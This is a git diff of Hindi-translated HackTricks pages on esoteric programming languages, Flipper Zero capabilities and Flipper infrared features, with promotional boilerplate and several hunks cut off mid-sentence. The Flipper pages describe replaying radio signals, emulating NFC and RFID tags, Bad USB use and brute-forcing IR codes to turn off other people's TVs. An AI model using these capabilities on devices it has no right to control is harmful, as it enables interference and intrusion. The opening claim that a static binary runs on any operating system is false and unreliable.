एक स्थिर बाइनरी एक प्रोग्राम होता है जो बाइनरी फ़ाइल के रूप में संग्रहीत होता है और इसे बिना किसी अन्य संगठनिक या वायरगत आवश्यकता के चलाया जा सकता है। यह अर्थ है कि इसे किसी भी ऑपरेटिंग सिस्टम पर चलाया जा सकता है, और इसके लिए किसी भी अतिरिक्त सॉफ़्टवेयर की आवश्यकता नहीं होती है। यह एक उपयोगी गुण होता है क्योंकि इसे आप अन्य सिस्टमों पर आसानी से वितरित कर सकते हैं और इसे अनुकूलित करने के लिए किसी भी अतिरिक्त सॉफ़्टवेयर की आवश्यकता नहीं होती है।
### स्थैतिक बाइनरी
```python
# This challenge is the exact same as the first challenge, except that it was
# compiled as a static binary. Normally, Angr automatically replaces standard
@ -897,10 +823,10 @@ main(sys.argv)
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **फॉलो** करें या **Twitter** पर [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**
</details>

View file

@ -1,35 +1,33 @@
# गूढ़ भाषाएँ
# एसोटेरिक भाषाएँ
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी क हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **[**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी क हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>
## [इसोलैंग विकि](https://esolangs.org/wiki/Main\_Page)
## [एसोलैंग्स विकि](https://esolangs.org/wiki/Main\_Page)
अधिक गूढ़ भाषाओं की खोज करने के लिए इस विकि की जांच करें
अधिक एसोटेरिक भाषाओं की खोज करने के लिए उस विकि की जांच करें
## Malbolge
```
('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}=<M:9wv6WsU2T|nm-,jcL(I&%$#"
`CB]V?Tx<uVtT`Rpo3NlF.Jh++FdbCBA@?]!~|4XzyTT43Qsqq(Lnmkj"Fhg${z@>
```
[http://malbolge.doleczek.pl/](http://malbolge.doleczek.pl)
## npiet
![](<../.gitbook/assets/image (146).png>)
[https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
## रॉकस्टार
## Rockstar
```
Midnight takes your heart and your soul
While your heart is as high as your soul
@ -58,9 +56,9 @@ Take it to the top
Whisper my world
```
{% embed url="https://codewithrockstar.com/" %}
## पेटू
## पेटूह
{% embed url="https://codewithrockstar.com/" %}
```
KoKoKoKoKoKoKoKoKoKo Kud-Kudah
KoKoKoKoKoKoKoKo kudah kO kud-Kudah Kukarek kudah
@ -74,10 +72,10 @@ Kukarek
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**.
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके।**
</details>

View file

@ -1,51 +1,53 @@
# फ्लिपर जीरो
# Flipper Zero
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर पर फॉलो** **करें** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
फ्लिपर जीरो के साथ आप कर सकते हैं:
वे सुरक्षित करने के लिए सबसे महत्वपूर्ण सुरक्षा गड़बड़ियों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपके हमले की सतह का ट्रैक करता है, प्रोएक्टिव खतरा स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम जैसे आपके पूरे टेक स्टैक में मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
* **रेडियो तार को सुनें/कैप्चर करें/रीप्ले करें:** [**सब-जीएचजी**](fz-sub-ghz.md)****
* **NFC कार्ड को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**NFC**](fz-nfc.md)****
* **125kHz टैग को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**125kHz RFID**](fz-125khz-rfid.md)****
* **इन्फ्रारेड सिग्नल को पढ़ें/कैप्चर करें/भेजें:** [**इन्फ्रारेड**](fz-infrared.md)****
* **iButton को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**iButton**](../ibutton.md)****
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
[**Flipper Zero**](https://flipperzero.one/) के साथ आप:
* **रेडियो तार की सुनें/कैप्चर/रीप्ले करें:** [**सब-जीएचजी**](fz-sub-ghz.md)****
* **NFC कार्ड पढ़ें/कैप्चर/इम्युलेट करें:** [**NFC**](fz-nfc.md)****
* **125kHz टैग पढ़ें/कैप्चर/इम्युलेट करें:** [**125kHz आरआईडीएफ**](fz-125khz-rfid.md)****
* **इन्फ्रारेड सिग्नल पढ़ें/कैप्चर/भेजें:** [**इन्फ्रारेड**](fz-infrared.md)****
* **iButtons पढ़ें/कैप्चर/इम्युलेट करें:** [**iButton**](../ibutton.md)****
* **इसे बैड USB के रूप में उपयोग करें**
* **इसे सुरक्षा कुंजी (U2F) के रूप में उपयोग करें**
* **सांप खेलें**
* **स्नेक खेलें**
**अन्य फ्लिपर जीरो संसाधन** [**https://github.com/djsime1/awesome-flipperzero**](https://github.com/djsime1/awesome-flipperzero)****
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
फ्लिपर जीरो के साथ आप कर सकते हैं:
वे सुरक्षित करने के लिए सबसे महत्वपूर्ण सुरक्षा गड़बड़ियों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपके हमले की सतह का ट्रैक करता है, प्रोएक्टिव खतरा स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम जैसे आपके पूरे टेक स्टैक में मुद्दे खोजता है। [**आज ही मुफ्त में इसे ट्राई करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
* **रेडियो तार को सुनें/कैप्चर करें/रीप्ले करें:** [**सब-जीएचजी**](fz-sub-ghz.md)****
* **NFC कार्ड को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**NFC**](fz-nfc.md)****
* **125kHz टैग को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**125kHz RFID**](fz-125khz-rfid.md)****
* **इन्फ्रारेड सिग्नल को पढ़ें/कैप्चर करें/भेजें:** [**इन्फ्रारेड**](fz-infrared.md)****
* **iButton को पढ़ें/कैप्चर करें/इम्युलेट करें:** [**iButton**](../ibutton.md)****
* **इसे बैड USB के रूप में उपयोग करें**
* **इसे सुरक्षा कुंजी (U2F) के रूप में उपयोग करें**
* **सांप खेलें**
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
**अन्य फ्लिपर जीरो संसाधन** [**https://github.com/djsime1/awesome-flipperzero**](https://github.com/djsime1/awesome-flipperzero)****
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) देखें
* [**आधिकारिक PEASS और HackTricks स्वैग**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर पर फॉलो** **करें** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने** की उपलब्धता चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।**
* **हैकिंग ट्रिक्स को शेयर करें द्वारा PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details>
## परिचय <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
इन्फ्रारेड काम करने के बारे में अधिक जानकारी के लिए देखें:
इन्फ्रारेड कैसे काम करता है के बारे में अधिक जानकारी के लिए देखें:
{% content-ref url="../infrared.md" %}
[infrared.md](../infrared.md)
@ -22,14 +22,16 @@
## फ्लिपर जीरो में आईआर सिग्नल रिसीवर <a href="#ir-signal-receiver-in-flipper-zero" id="ir-signal-receiver-in-flipper-zero"></a>
फ्लिपर जीरो एक डिजिटल आईआर सिग्नल रिसीवर TSOP का उपयोग करता है, जो **आईआर रिमोट से सिग्नल को अवरोधित करने की अनुमति देता है**। कुछ **स्मार्टफोन** जैसे Xiaomi में भी एक आईआर पोर्ट होता है, लेकिन ध्यान दें कि **इनमें से अधिकांश केवल सिग्नल ट्रांसमिट कर सकते हैं** और उन्हें **सिग्नल प्राप्त नहीं कर सकते** हैं
फ्लिपर एक डिजिटल आईआर सिग्नल रिसीवर TSOP का उपयोग करता है, जो **आईआर रिमोट्स से सिग्नल अंतरण करने की अनुमति देता है**। कुछ **स्मार्टफोन** जैसे Xiaomi, जिनमें एक आईआर पोर्ट होता है, लेकिन ध्यान रखें कि **अधिकांश उनमें केवल सिग्नल भेज सकते हैं** और **प्राप्त नहीं कर सकते**।
फ्लिपर इन्फ्रारेड **रिसीवर काफी संवेदनशील है**। आप इसे तब भी **सिग्नल पकड़ सकते हैं** जब आप रिमोट और टीवी के बीच कहीं **बीच में रहते हैं**। फ्लिपर के आईआर पोर्ट की ओर सीधे रिमोट को देखाने की आवश्यकता नहीं है। यह उपयोगी होता है जब कोई टीवी के पास खड़ा होकर चैनल बदल रहा होता है, और आप और फ्लिपर दोनों दूरी में होते हैं।
फ्लिपर इन्फ्रारेड **रिसीवर काफी संवेदनशील** है। आप तब भी **सिग्नल को पकड़ सकते हैं** जब आप दूरी के बीच किसी भी रिमोट और टीवी के बीच रहते हैं। फ्लिपर के आईआर पोर्ट की ओर सीधे रिमोट करना अनावश्यक है। यह उपयोगी होता है जब कोई टीवी के पास खड़ा होकर चैनल बदल रहा है, और आप और फ्लिपर दोनों दूरी पर हैं।
आईआर सिग्नल के **डिकोडिंग** का काम **सॉफ़्टवेयर** द्वारा होता है, इसलिए फ्लिपर जीरो संभावित रूप से किसी भी आईआर रिमोट कोड क**प्राप्ति और प्रसारण का समर्थन** करता है। अज्ञात प्रोटोकॉल के मामले में जो पहचान नहीं की जा सकती है - यह उसे **यथार्थ रूप से रिकॉर्ड और प्लेबैक** करता है।
इन्फ्रारेड सिग्नल का **डिकोडिंग सॉफ़्टवेयर** द्वारा होता है, इसलिए फ्लिपर जीरो संभावित रूप से **किसी भी आईआर रिमोट कोड कप्राप्ति और प्रसारण समर्थन** करता है। **अज्ञात** प्रोटोकॉल के मामले में जो पहचाना नहीं जा सकता था - यह **रॉ सिग्नल को बिल्कुल वैसे ही रिकॉर्ड और प्लेबैक** करता है जैसा प्राप्त हुआ था
## क्रियाएँ
### यूनिवर्सल रिमोट
### यूनिवर्सल रिमोट्स
फ्लिपर जीरो को **यूनिवर्सल रिमोट के रूप में उपयोग** किया जा सकता है ताकि किसी भी टीवी, एयर कंडीशनर या मीडिया सेंटर को नियंत्रित किया जा सके। इस मोड में, फ्लिपर **एसडी कार्ड के शब्दकोश के अनुसार सभी समर्थित निर्माताओं के सभी ज्ञात कोड** का **ब्रूटफ़ोर्स** करता है। आपको एक विशेष रिमोट का चयन करने की आवश्यकता नहीं है एक रेस्टोरेंट टीवी को बं
फ्लिपर जीरो को **किसी भी टीवी, एयर कंडीशनर, या मीडिया सेंटर को नियंत्रित करने के लिए एक यूनिवर्सल रिमोट** के रूप में उपयोग किया जा सकता है। इस मोड में, फ्लिपर **एसडी कार्ड से शब्दकोश के अनुसार सभी समर्थित निर्माताओं के सभी ज्ञात कोड** का **ब्रूटफोर्स** करता है। आपको किसी विशेष रिमोट को चुनने की आवश्यकता नहीं है एक रेस्टोरेंट टीवी को बंद करने के लिए।
यून

View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) में **या** मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
